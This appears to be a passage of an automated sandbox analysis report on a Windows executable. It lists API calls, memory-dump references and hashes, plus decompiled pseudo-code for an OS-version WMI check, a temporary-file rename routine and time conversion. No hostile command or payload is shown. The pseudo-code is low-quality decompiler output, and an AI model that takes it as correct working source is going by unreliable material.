                                                    0x00cdfe52
                                                    0x00000000
                                                    0x00cdfd8f
                                                    0x00cdfd9f
                                                    0x00cdfda1
                                                    0x00cdfda6
                                                    0x00cdfe57
                                                    0x00cdfe57
                                                    0x00cdfe5f
                                                    0x00cdfe64
                                                    0x00cdfe64
                                                    0x00cdfe6a
                                                    0x00000000
                                                    0x00cdfdac
                                                    0x00cdfdac
                                                    0x00cdfdb3
                                                    0x00cdfdbc
                                                    0x00cdfdd4
                                                    0x00cdfdd5
                                                    0x00cdfdda
                                                    0x00cdfddd
                                                    0x00cdfddf
                                                    0x00cdfde2
                                                    0x00cdfdbe
                                                    0x00cdfdbe
                                                    0x00cdfdc3
                                                    0x00cdfdc6
                                                    0x00cdfdc8
                                                    0x00cdfdcb
                                                    0x00cdfdcb
                                                    0x00cdfe08
                                                    0x00cdfe43
                                                    0x00cdfe48
                                                    0x00000000
                                                    0x00cdfe0a
                                                    0x00cdfe14
                                                    0x00cdfe1c
                                                    0x00cdfe6f
                                                    0x00cdfe75
                                                    0x00cdfe78
                                                    0x00cdfe7d
                                                    0x00cdfe7d
                                                    0x00cdfe80
                                                    0x00cdfe88
                                                    0x00cdfe8d
                                                    0x00cdfe8d
                                                    0x00cdfe93
                                                    0x00cdfe98
                                                    0x00cdfe99
                                                    0x00cdfe9a
                                                    0x00cdfe9b
                                                    0x00cdfe9c
                                                    0x00cdfe9d
                                                    0x00cdfe9e
                                                    0x00cdfe9f
                                                    0x00cdfea0
                                                    0x00cdfea3
                                                    0x00cdfea6
                                                    0x00cdfea7
                                                    0x00cdfea9
                                                    0x00cdfeb2
                                                    0x00cdfeb5
                                                    0x00cdfeb8
                                                    0x00cdfebb
                                                    0x00cdfec4
                                                    0x00cdfecf
                                                    0x00cdfed5
                                                    0x00cdfed7
                                                    0x00cdfedc
                                                    0x00cdfe1e
                                                    0x00cdfe1f
                                                    0x00cdfe25
                                                    0x00cdfe2d
                                                    0x00cdfe30
                                                    0x00cdfe35
                                                    0x00cdfe35
                                                    0x00cdfe3a
                                                    0x00000000
                                                    0x00cdfe3c
                                                    0x00cdfe3c
                                                    0x00000000
                                                    0x00cdfe3c
                                                    0x00cdfe3a
                                                    0x00cdfe1c
                                                    0x00cdfe08
                                                    0x00cdfda6
                                                    0x00cdfd4d
                                                    0x00cdfd4d
                                                    0x00cdfd4f
                                                    0x00cdfd55
                                                    0x00cdfd5d
                                                    0x00cdfd5e
                                                    0x00cdfd5f
                                                    0x00cdfd6d
                                                    0x00cdfd6d

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,349E4B74,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFD99
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE14
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CDFE1F
                                                    • _com_issue_error.COMSUPP ref: 00CDFE48
                                                    • _com_issue_error.COMSUPP ref: 00CDFE52
                                                    • GetLastError.KERNEL32(80070057,349E4B74,00000001,00000000,00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE57
                                                    • _com_issue_error.COMSUPP ref: 00CDFE6A
                                                    • GetLastError.KERNEL32(00000000,?,?,00CCAF6C,ROOT\CIMV2), ref: 00CDFE80
                                                    • _com_issue_error.COMSUPP ref: 00CDFE93
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                    • String ID:
                                                    • API String ID: 1353541977-0
                                                    • Opcode ID: f47b0364b21e274300b8395eff8d559f051d035b7f87e71740edf2f9316ad8b4
                                                    • Instruction ID: 16c1c7d2a3311061220dbafdef9f074fb83e4c6c3ac5a5ad70f61f0d79630d8f
                                                    • Opcode Fuzzy Hash: f47b0364b21e274300b8395eff8d559f051d035b7f87e71740edf2f9316ad8b4
                                                    • Instruction Fuzzy Hash: 824138B1A00248ABDB109F65CC45BAEBBA8FF44710F14423FFA16E7351D7349A01C7A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 29%
                                                    			E00CCAF24() {
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;
				intOrPtr* _t67;
				signed char _t70;
				intOrPtr* _t72;
				signed char** _t75;
				signed char** _t76;
				signed char* _t77;
				intOrPtr* _t78;
				void* _t80;
				signed char _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				signed char _t92;
				signed char _t98;
				signed char _t105;
				signed char _t108;
				signed char* _t118;
				signed char _t119;
				signed char _t127;
				signed char _t139;
				void* _t147;
				void* _t149;
				void* _t155;
				void* _t162;

				E00CDEB78(0xcf2919, _t162);
				_push(_t162 - 0x14);
				_push(0xcf574c);
				_t105 = 0;
				_push(1);
				_push(0);
				_push(0xcf581c);
				 *((intOrPtr*)(_t162 - 0x14)) = 0;
				if( *0xd23188() >= 0) {
					_push(L"ROOT\\CIMV2");
					 *((intOrPtr*)(_t162 - 0x10)) = 0;
					_t63 =  *((intOrPtr*)(E00CCAE2D(_t162 - 0x20)));
					 *(_t162 - 4) = 0;
					if(_t63 == 0) {
						_t108 = 0;
					} else {
						_t108 =  *_t63;
					}
					_t64 =  *((intOrPtr*)(_t162 - 0x14));
					 *0xcf3278(_t64, _t108, _t105, _t105, _t105, _t105, _t105, _t105, _t162 - 0x10, _t147);
					_t66 =  *((intOrPtr*)( *_t64 + 0xc))();
					 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
					_t149 = _t66;
					_t110 =  *(_t162 - 0x20);
					if( *(_t162 - 0x20) != 0) {
						E00CCAEF6(_t110);
					}
					if(_t149 < 0) {
						L21:
						_t67 =  *((intOrPtr*)(_t162 - 0x14));
						 *0xcf3278(_t67);
						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))();
						_t70 = 0;
					} else {
						_push(_t105);
						_push(_t105);
						_push(3);
						_push(3);
						_push(_t105);
						_push(_t105);
						_push(0xa);
						_push( *((intOrPtr*)(_t162 - 0x10)));
						if( *0xd23184() < 0) {
							L20:
							_t72 =  *((intOrPtr*)(_t162 - 0x10));
							 *0xcf3278(_t72);
							 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))();
							goto L21;
						} else {
							_push("SELECT * FROM Win32_OperatingSystem");
							 *(_t162 - 0x18) = _t105;
							_t75 = E00CCADDB(_t162 - 0x28);
							_push("WQL");
							 *(_t162 - 4) = 1;
							_t76 = E00CCADDB(_t162 - 0x20);
							_t118 =  *_t75;
							 *(_t162 - 4) = 2;
							if(_t118 == 0) {
								_t139 = _t105;
							} else {
								_t139 =  *_t118;
							}
							_t77 =  *_t76;
							if(_t77 == 0) {
								_t119 = _t105;
							} else {
								_t119 =  *_t77;
							}
							_t78 =  *((intOrPtr*)(_t162 - 0x10));
							 *0xcf3278(_t78, _t119, _t139, 0x30, _t105, _t162 - 0x18);
							_t80 =  *((intOrPtr*)( *_t78 + 0x50))();
							_t121 =  *(_t162 - 0x20);
							_t155 = _t80;
							if( *(_t162 - 0x20) != 0) {
								E00CCAEF6(_t121);
								 *(_t162 - 0x20) = _t105;
							}
							 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
							_t122 =  *((intOrPtr*)(_t162 - 0x28));
							if( *((intOrPtr*)(_t162 - 0x28)) != 0) {
								E00CCAEF6(_t122);
							}
							if(_t155 >= 0) {
								_t81 =  *(_t162 - 0x18);
								 *(_t162 - 0x1c) = _t105;
								 *(_t162 - 0x24) = _t105;
								if(_t81 != 0) {
									while(1) {
										 *0xcf3278(_t81, 0xffffffff, 1, _t162 - 0x1c, _t162 - 0x24);
										 *((intOrPtr*)( *_t81 + 0x10))();
										if( *(_t162 - 0x24) == 0) {
											goto L26;
										}
										_t92 =  *(_t162 - 0x1c);
										 *0xcf3278(_t92, L"Name", 0, _t162 - 0x38, 0, 0);
										 *((intOrPtr*)( *_t92 + 0x10))();
										_t105 = _t105 | E00CE23F9( *((intOrPtr*)( *_t92 + 0x10))) & 0xffffff00 | _t95 != 0x00000000;
										__imp__#9(_t162 - 0x38,  *((intOrPtr*)(_t162 - 0x30)), L"Windows 10");
										_t98 =  *(_t162 - 0x1c);
										 *0xcf3278(_t98);
										 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
										_t81 =  *(_t162 - 0x18);
										if(_t81 != 0) {
											continue;
										}
										goto L26;
									}
								}
								L26:
								_t82 =  *((intOrPtr*)(_t162 - 0x10));
								 *0xcf3278(_t82);
								 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))();
								_t85 =  *((intOrPtr*)(_t162 - 0x14));
								 *0xcf3278(_t85);
								 *((intOrPtr*)( *((intOrPtr*)( *_t85 + 8))))();
								_t127 =  *(_t162 - 0x18);
								 *0xcf3278(_t127);
								 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))();
								_t70 = _t105;
							} else {
								goto L20;
							}
						}
					}
				} else {
					_t70 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
				return _t70;
			}





























                                                    0x00ccaf29
                                                    0x00ccaf38
                                                    0x00ccaf39
                                                    0x00ccaf3f
                                                    0x00ccaf41
                                                    0x00ccaf42
                                                    0x00ccaf43
                                                    0x00ccaf48
                                                    0x00ccaf53
                                                    0x00ccaf5c
                                                    0x00ccaf64
                                                    0x00ccaf6c
                                                    0x00ccaf6e
                                                    0x00ccaf73
                                                    0x00ccaf79
                                                    0x00ccaf75
                                                    0x00ccaf75
                                                    0x00ccaf75
                                                    0x00ccaf7b
                                                    0x00ccaf90
                                                    0x00ccaf96
                                                    0x00ccaf99
                                                    0x00ccaf9d
                                                    0x00ccaf9f
                                                    0x00ccafa4
                                                    0x00ccafa6
                                                    0x00ccafa6
                                                    0x00ccafad
                                                    0x00ccb05b
                                                    0x00ccb05b
                                                    0x00ccb066
                                                    0x00ccb06c
                                                    0x00ccb06e
                                                    0x00ccafb3
                                                    0x00ccafb3
                                                    0x00ccafb4
                                                    0x00ccafb5
                                                    0x00ccafb7
                                                    0x00ccafb9
                                                    0x00ccafba
                                                    0x00ccafbb
                                                    0x00ccafbd
                                                    0x00ccafc8
                                                    0x00ccb048
                                                    0x00ccb048
                                                    0x00ccb053
                                                    0x00ccb059
                                                    0x00000000
                                                    0x00ccafca
                                                    0x00ccafca
                                                    0x00ccafd2
                                                    0x00ccafd5
                                                    0x00ccafdc
                                                    0x00ccafe4
                                                    0x00ccafe7
                                                    0x00ccafec
                                                    0x00ccafee
                                                    0x00ccaff4
                                                    0x00ccaffa
                                                    0x00ccaff6
                                                    0x00ccaff6
                                                    0x00ccaff6
                                                    0x00ccaffc
                                                    0x00ccb000
                                                    0x00ccb006
                                                    0x00ccb002
                                                    0x00ccb002
                                                    0x00ccb002
                                                    0x00ccb008
                                                    0x00ccb01a
                                                    0x00ccb020
                                                    0x00ccb023
                                                    0x00ccb026
                                                    0x00ccb02a
                                                    0x00ccb02c
                                                    0x00ccb031
                                                    0x00ccb031
                                                    0x00ccb034
                                                    0x00ccb038
                                                    0x00ccb03d
                                                    0x00ccb03f
                                                    0x00ccb03f
                                                    0x00ccb046
                                                    0x00ccb075
                                                    0x00ccb078
                                                    0x00ccb07b
                                                    0x00ccb080
                                                    0x00ccb084
                                                    0x00ccb096
                                                    0x00ccb09c
                                                    0x00ccb0a2
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccb0a4
                                                    0x00ccb0b9
                                                    0x00ccb0bf
                                                    0x00ccb0d5
                                                    0x00ccb0dc
                                                    0x00ccb0e2
                                                    0x00ccb0ed
                                                    0x00ccb0f3
                                                    0x00ccb0f5
                                                    0x00ccb0fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccb0fa
                                                    0x00ccb084
                                                    0x00ccb0fc
                                                    0x00ccb0fc
                                                    0x00ccb107
                                                    0x00ccb10d
                                                    0x00ccb10f
                                                    0x00ccb11a
                                                    0x00ccb120
                                                    0x00ccb122
                                                    0x00ccb12d
                                                    0x00ccb133
                                                    0x00ccb135
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccb046
                                                    0x00ccafc8
                                                    0x00ccaf55
                                                    0x00ccaf55
                                                    0x00ccaf55
                                                    0x00ccb13d
                                                    0x00ccb145

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                    • API String ID: 3519838083-3505469590
                                                    • Opcode ID: a3aaa0be0d501fb7b7e20a7f28bffa99cc909c3451aa889f7e5f5bdbe6a8fb10
                                                    • Instruction ID: 01b7350b5a9d95961e40c0feb5bf08f966433e03c56ed3b577a8b6b96dd08e62
                                                    • Opcode Fuzzy Hash: a3aaa0be0d501fb7b7e20a7f28bffa99cc909c3451aa889f7e5f5bdbe6a8fb10
                                                    • Instruction Fuzzy Hash: D2715D71A00619AFDB14DFA5CC99EBEBBB9FF48714B14015DE512A72A0CB30AE41CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E00CC9382() {
				void* _t32;
				short _t33;
				long _t35;
				void* _t40;
				short _t42;
				void* _t66;
				intOrPtr _t69;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E00CDEB78(0xcf28b1, _t84);
				E00CDEC50(0x503c);
				_t82 =  *(_t84 + 8);
				_t32 = _t84 - 0x4048;
				__imp__GetLongPathNameW(_t82, _t32, 0x800, _t76, _t81, _t66);
				if(_t32 == 0 || _t32 >= 0x800) {
					L20:
					_t33 = 0;
					__eflags = 0;
				} else {
					_t35 = GetShortPathNameW(_t82, _t84 - 0x5048, 0x800);
					if(_t35 == 0) {
						goto L20;
					} else {
						_t91 = _t35 - 0x800;
						if(_t35 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E00CCC29A(_t91, _t84 - 0x4048);
							_t78 = E00CCC29A(_t91, _t84 - 0x5048);
							_t69 = 0;
							if( *_t39 == 0) {
								goto L20;
							} else {
								_t40 = E00CD1FBB( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t40;
								if(_t40 == 0) {
									goto L20;
								} else {
									_t42 = E00CD1FBB(E00CCC29A(_t93, _t82), _t78);
									if(_t42 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t42;
										_t79 = 0;
										while(1) {
											_t95 = _t42;
											if(_t42 != 0) {
												break;
											}
											E00CD0602(_t84 - 0x1010, _t82, 0x800);
											E00CC4092(E00CCC29A(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E00CCA231(_t84 - 0x1010) == 0) {
												_t42 =  *(_t84 - 0x1010);
											} else {
												_t42 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t42;
												if(_t42 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E00CD0602(_t84 - 0x3048, _t82, 0x800);
										_push(0x800);
										E00CCC310(_t98, _t84 - 0x3048,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3048, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00CC9556(_t84 - 0x2048);
											 *((intOrPtr*)(_t84 - 4)) = _t69;
											if(E00CCA231(_t82) == 0) {
												_t69 = E00CC966E(_t84 - 0x2048, _t82, 0x12);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3048);
											if(_t69 != 0) {
												E00CC9620(_t84 - 0x2048);
												E00CC974E(_t84 - 0x2048);
											}
											E00CC959A(_t84 - 0x2048);
											_t33 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t33;
			}
















                                                    0x00cc9387
                                                    0x00cc9391
                                                    0x00cc9398
                                                    0x00cc939b
                                                    0x00cc93aa
                                                    0x00cc93b2
                                                    0x00cc9543
                                                    0x00cc9543
                                                    0x00cc9543
                                                    0x00cc93c0
                                                    0x00cc93c9
                                                    0x00cc93d1
                                                    0x00000000
                                                    0x00cc93d7
                                                    0x00cc93d7
                                                    0x00cc93d9
                                                    0x00000000
                                                    0x00cc93df
                                                    0x00cc93eb
                                                    0x00cc93fa
                                                    0x00cc93fc
                                                    0x00cc9401
                                                    0x00000000
                                                    0x00cc9407
                                                    0x00cc940b
                                                    0x00cc9410
                                                    0x00cc9412
                                                    0x00000000
                                                    0x00cc9418
                                                    0x00cc9420
                                                    0x00cc9427
                                                    0x00000000
                                                    0x00cc942d
                                                    0x00cc942d
                                                    0x00cc9434
                                                    0x00cc9436
                                                    0x00cc9436
                                                    0x00cc9439
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9448
                                                    0x00cc9465
                                                    0x00cc946a
                                                    0x00cc947b
                                                    0x00cc9488
                                                    0x00cc947d
                                                    0x00cc947d
                                                    0x00cc947f
                                                    0x00cc947f
                                                    0x00cc948f
                                                    0x00cc9498
                                                    0x00000000
                                                    0x00cc949a
                                                    0x00cc949a
                                                    0x00cc949d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc949d
                                                    0x00000000
                                                    0x00cc9498
                                                    0x00cc94b1
                                                    0x00cc94b6
                                                    0x00cc94c1
                                                    0x00cc94dc
                                                    0x00000000
                                                    0x00cc94de
                                                    0x00cc94e4
                                                    0x00cc94ea
                                                    0x00cc94f4
                                                    0x00cc9504
                                                    0x00cc9504
                                                    0x00cc9514
                                                    0x00cc951c
                                                    0x00cc9524
                                                    0x00cc952f
                                                    0x00cc952f
                                                    0x00cc953a
                                                    0x00cc953f
                                                    0x00cc953f
                                                    0x00cc94dc
                                                    0x00cc9427
                                                    0x00cc9412
                                                    0x00cc9401
                                                    0x00cc93d9
                                                    0x00cc93d1
                                                    0x00cc9545
                                                    0x00cc954b
                                                    0x00cc9553

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC9387
                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CC93AA
                                                    • GetShortPathNameW.KERNEL32 ref: 00CC93C9
                                                      • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                      • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                    • _swprintf.LIBCMT ref: 00CC9465
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • MoveFileW.KERNEL32(?,?), ref: 00CC94D4
                                                    • MoveFileW.KERNEL32(?,?), ref: 00CC9514
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                    • String ID: rtmp%d
                                                    • API String ID: 3726343395-3303766350
                                                    • Opcode ID: 8f6e62e2e90f0bc5a4f0515021fd1356cd66d802ad0d66964f4554935848f1ec
                                                    • Instruction ID: 11261bda344177604be83e9edff758fa901511ead7602192c3cf0be925ba0a13
                                                    • Opcode Fuzzy Hash: 8f6e62e2e90f0bc5a4f0515021fd1356cd66d802ad0d66964f4554935848f1ec
                                                    • Instruction Fuzzy Hash: C14156B190025866DF21FBA0CC49FEE737CEF45340F0449A9F659E3551DA388B89EB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E00CD1218(intOrPtr* __ecx, long __edx, void* __ebp, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				intOrPtr* _v68;
				struct _FILETIME _v76;
				intOrPtr _v80;
				signed int _t78;
				long _t82;
				signed int _t87;
				signed int _t92;
				void* _t93;
				long _t94;
				signed int _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				signed int* _t99;
				void* _t100;
				signed int _t101;

				_t100 = __ebp;
				_t94 = __edx;
				_t97 = __ecx;
				_v68 = __ecx;
				_v80 = E00CDF1E0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76.dwLowDateTime = _t94;
				if(E00CCB146() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v76);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v76.dwLowDateTime = 0 - _v56.dwLowDateTime + _v76.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v76.dwHighDateTime = _v76.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v76);
				}
				_push(_t100);
				FileTimeToSystemTime( &_v76,  &_v48);
				_t99 = _a4;
				_t92 = _v48.wDay & 0x0000ffff;
				_t101 = _v48.wMonth & 0x0000ffff;
				_t95 = _v48.wYear & 0x0000ffff;
				_t99[3] = _v48.wHour & 0x0000ffff;
				_t87 = _t92 - 1;
				_t99[4] = _v48.wMinute & 0x0000ffff;
				_t99[5] = _v48.wSecond & 0x0000ffff;
				_t99[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t99 = _v48.wYear & 0x0000ffff;
				_t99[1] = _t101;
				_t99[2] = _t92;
				_t99[8] = _t87;
				_v76.dwLowDateTime = 1;
				if(_t101 > 1) {
					_t96 = _t87;
					_t98 = 0xcfe1a8;
					_t93 = 4;
					while(1) {
						_t87 = _t96;
						if(_t93 > 0x30) {
							break;
						}
						_t93 = _t93 + 4;
						_t87 =  *_t98 + _t96;
						_t82 = _v76.dwLowDateTime + 1;
						_t99[8] = _t87;
						_t98 = _t98 + 4;
						_v76.dwLowDateTime = _t82;
						_t96 = _t87;
						if(_t82 < _t101) {
							continue;
						}
						break;
					}
					_t97 = _v68;
					_t95 = _v48.wYear & 0x0000ffff;
				}
				if(_t101 > 2 && E00CD13A4(_t95) != 0) {
					_t99[8] = _t87 + 1;
				}
				_t78 = E00CDF250( *_t97,  *((intOrPtr*)(_t97 + 4)), 0x3b9aca00, 0);
				_t99[6] = _t78;
				return _t78;
			}























                                                    0x00cd1218
                                                    0x00cd1218
                                                    0x00cd121e
                                                    0x00cd1225
                                                    0x00cd1233
                                                    0x00cd1237
                                                    0x00cd1245
                                                    0x00cd1263
                                                    0x00cd1274
                                                    0x00cd1284
                                                    0x00cd1294
                                                    0x00cd12a6
                                                    0x00cd12ae
                                                    0x00cd12b4
                                                    0x00cd12ba
                                                    0x00cd12be
                                                    0x00cd12c0
                                                    0x00cd1247
                                                    0x00cd1251
                                                    0x00cd1251
                                                    0x00cd12c4
                                                    0x00cd12cf
                                                    0x00cd12d5
                                                    0x00cd12de
                                                    0x00cd12e3
                                                    0x00cd12e8
                                                    0x00cd12ed
                                                    0x00cd12f5
                                                    0x00cd12f8
                                                    0x00cd1300
                                                    0x00cd1308
                                                    0x00cd130e
                                                    0x00cd1310
                                                    0x00cd1313
                                                    0x00cd1316
                                                    0x00cd1319
                                                    0x00cd131f
                                                    0x00cd1323
                                                    0x00cd1325
                                                    0x00cd132a
                                                    0x00cd132b
                                                    0x00cd132b
                                                    0x00cd1330
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1334
                                                    0x00cd133b
                                                    0x00cd133d
                                                    0x00cd133e
                                                    0x00cd1341
                                                    0x00cd1344
                                                    0x00cd1348
                                                    0x00cd134c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd134c
                                                    0x00cd134e
                                                    0x00cd1352
                                                    0x00cd1352
                                                    0x00cd135b
                                                    0x00cd136a
                                                    0x00cd136a
                                                    0x00cd1379
                                                    0x00cd137f
                                                    0x00cd1387

                                                    APIs
                                                    • __aulldiv.LIBCMT ref: 00CD122E
                                                      • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CD1251
                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CD1263
                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CD1274
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1284
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1294
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CD12CF
                                                    • __aullrem.LIBCMT ref: 00CD1379
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                    • String ID:
                                                    • API String ID: 1247370737-0
                                                    • Opcode ID: 6a59a9fbe35db9dab02c4225d7442a7e34a9fbbeebc5fcfde6a9a8f0d4c7541e
                                                    • Instruction ID: 3af096e8fa9b8c7c418f5ad2374f8de2ab11cfc964b4419aa5790d9614b02da0
                                                    • Opcode Fuzzy Hash: 6a59a9fbe35db9dab02c4225d7442a7e34a9fbbeebc5fcfde6a9a8f0d4c7541e
